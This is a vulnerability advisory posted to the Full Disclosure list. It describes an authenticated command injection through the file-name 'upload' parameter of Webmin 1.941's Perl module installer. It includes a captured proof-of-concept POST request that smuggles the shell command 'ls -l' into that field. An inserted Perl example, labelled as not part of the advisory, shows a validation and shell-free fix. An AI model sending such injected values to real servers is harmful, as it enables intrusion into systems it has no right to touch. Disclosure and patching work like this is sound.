Message-ID: <CAJ-5kWYXfZUypUm1Xtj2HBuG_XkDSMhRtZ=95b1y_bv00pZffg@mail.gmail.com>
Date: Wed, 6 May 2020 08:47:23 +0200
From: raki ben hamouda <raki7bh@...il.com>
To: "submit@...sec.com" <submit@...sec.com>,
 Packet Storm <packet@...ketstormsecurity.com>, 
 "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] Webmin (Upload Module) Remote Command Injection Vulnerability

Document Title:
===============
Webmin 1.941 (Install Module) Remote Command Injection Vulnerability



Common Vulnerability Scoring System:
====================================
8.5


Vulnerability Class:
====================
Command Injection


Current Estimated Price:
========================
2.000€ - 3.000€


Affected Product(s):
====================
Webmin

Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
A remote, authenticated command injection vulnerability has been discovered
in the official Webmin product.
The vulnerability allows a remote attacker whose account has only the
"Install Module" permission of the Perl Modules component
to execute arbitrary operating system commands.
The cause is that the user-supplied "upload" parameter is passed to Perl's
open() function without any check, so shell metacharacters in it lead to
execution of arbitrary commands.

The vulnerability is located in the `/cpan/download.cgi` module, in the
`upload` parameter that carries the file name of the module archive to
install.

The security risk of the arbitrary RCE vulnerability is estimated as High,
with a CVSS (Common Vulnerability Scoring System) score of 8.5.
Exploitation of the RCE web vulnerability requires a low-privileged
web-application user account and no user interaction.
Successful exploitation of the vulnerability results in loss of
availability, integrity and confidentiality.

===============================
## When digging in code:

I needed only to reach this line of code to make it work:

&install_error(&text('download_etar', "<tt>$tar</tt>"));

However, the problem is not limited to passing user input directly to
open(); the same unchecked input also reaches all of these lines:

    open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");
    system("cd $mtemp ; gunzip -c $dirs{$d} | tar xf - >/dev/null");
    system("$cmd >/dev/null 2>&1 </dev/null");
    %needreqs = map { eval "use $_"; $@ ? ($_, 1) : ($_, 0) } @allreqs;
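The lines above all interpolate a user-controlled string into text that a shell parses. The following Perl is an added example, not Webmin's own code and not part of the advisory: it shows the two changes a fix needs, a strict allow-list on the uploaded file name and a list-form open() that never involves /bin/sh. The function names safe_module_name and list_archive, and the sample inputs, are assumptions made for this illustration.

```perl
#!/usr/bin/perl
# Added example, not Webmin's code: one way download.cgi could validate the
# uploaded file name and list the archive without a shell. safe_module_name()
# and list_archive() are names assumed for this illustration.
use strict;
use warnings;
use File::Basename qw(basename);

# Accept only a plain archive name: a letter or digit followed by word
# characters, dots and dashes, ending in .tar.gz or .tgz. Spaces, quotes,
# pipes, '&', ';', '$', newlines and path separators never pass, so nothing
# shell-significant can reach a later open() or system().
sub safe_module_name {
    my ($name) = @_;
    return unless defined $name;
    my $base = basename($name);   # drop any directory part the client supplied
    return unless $base =~ /\A([A-Za-z0-9][\w.-]*\.(?:tar\.gz|tgz))\z/;
    return $1;                    # the capture is also untainted under -T
}

# List the archive contents without involving /bin/sh: the list-form
# open() passes argv directly to the program, so whatever is in $pfile is
# seen by tar as a single file name and is never parsed for metacharacters.
# (The vulnerable code built a shell string instead:
#   open(TAR, "( gunzip -c $pfile | tar tf - ) 2>&1 |");)
sub list_archive {
    my ($pfile) = @_;
    open(my $tar, '-|', 'tar', '-tzf', $pfile)
        or die "cannot run tar: $!";
    chomp(my @entries = <$tar>);
    close($tar);
    return @entries;
}

# Constructed sample inputs: a normal upload name, the string from the
# advisory, a semicolon variant and a path-traversal attempt.
my @samples = (
    'Foo-Bar-1.23.tar.gz',
    'file | ls -l && err',
    'Foo.tgz; ls -l',
    '../../tmp/Foo.tar.gz',
);
for my $s (@samples) {
    my $ok = safe_module_name($s);
    printf "%-24s -> %s\n", "'$s'",
        defined $ok ? "accepted as $ok" : 'rejected';
}
```

Running the script prints "accepted as Foo-Bar-1.23.tar.gz" for the first name, "rejected" for the two injection strings, and "accepted as Foo.tar.gz" for the traversal attempt (the directory part is discarded). list_archive() is shown only for the pattern; it needs a real archive on disk to do anything. Running under `perl -T` confirms that only the captured name is usable in the later open(), because everything else derived from the request stays tainted.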



=============================

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] /cpan/download.cgi

Vulnerable Parameter(s):
[+] upload


Server version
1.941


Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers with a
low-privileged web-application user account and without user interaction.
For a security demonstration, or to reproduce the vulnerability, follow the
information and steps provided below.


1-The attacker must have permission to the Install Perl Modules component
2-Go to "Others" -> "Perl Modules" -> "Install Modules" -> select 'From
Uploaded File' -> pick any file
3-The attacker intercepts the request that follows:

--- PoC Session Logs [POST] ---

POST /cpan/download.cgi HTTP/1.1
Host: 192.168.239.129:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: download.cgi
X-Requested-From: cpan
X-Requested-From-Tab: webmin
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------
7478318236766462923988573986
Content-Length: 682
Origin: https://192.168.239.129:10000
Connection: close
Referer: https://192.168.239.129:10000/cpan/?xnavigation=1
Cookie: redirect=1; testing=1; sid=110b33c42e470d0aafa5ab11fe9d09a7

-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="cpan"


-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="local"


-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="source"

1
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="upload"; filename="file | ls -l &&
err"
Content-Type: [nothing here]

[Nothing Here]
-----------------------------7478318236766462923988573986
Content-Disposition: form-data; name="url"


-----------------------------7478318236766462923988573986--


4-Modify the "upload" parameter with the string: "file | ls -l && err"

##Successfully reproduced the Vulnerability.

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
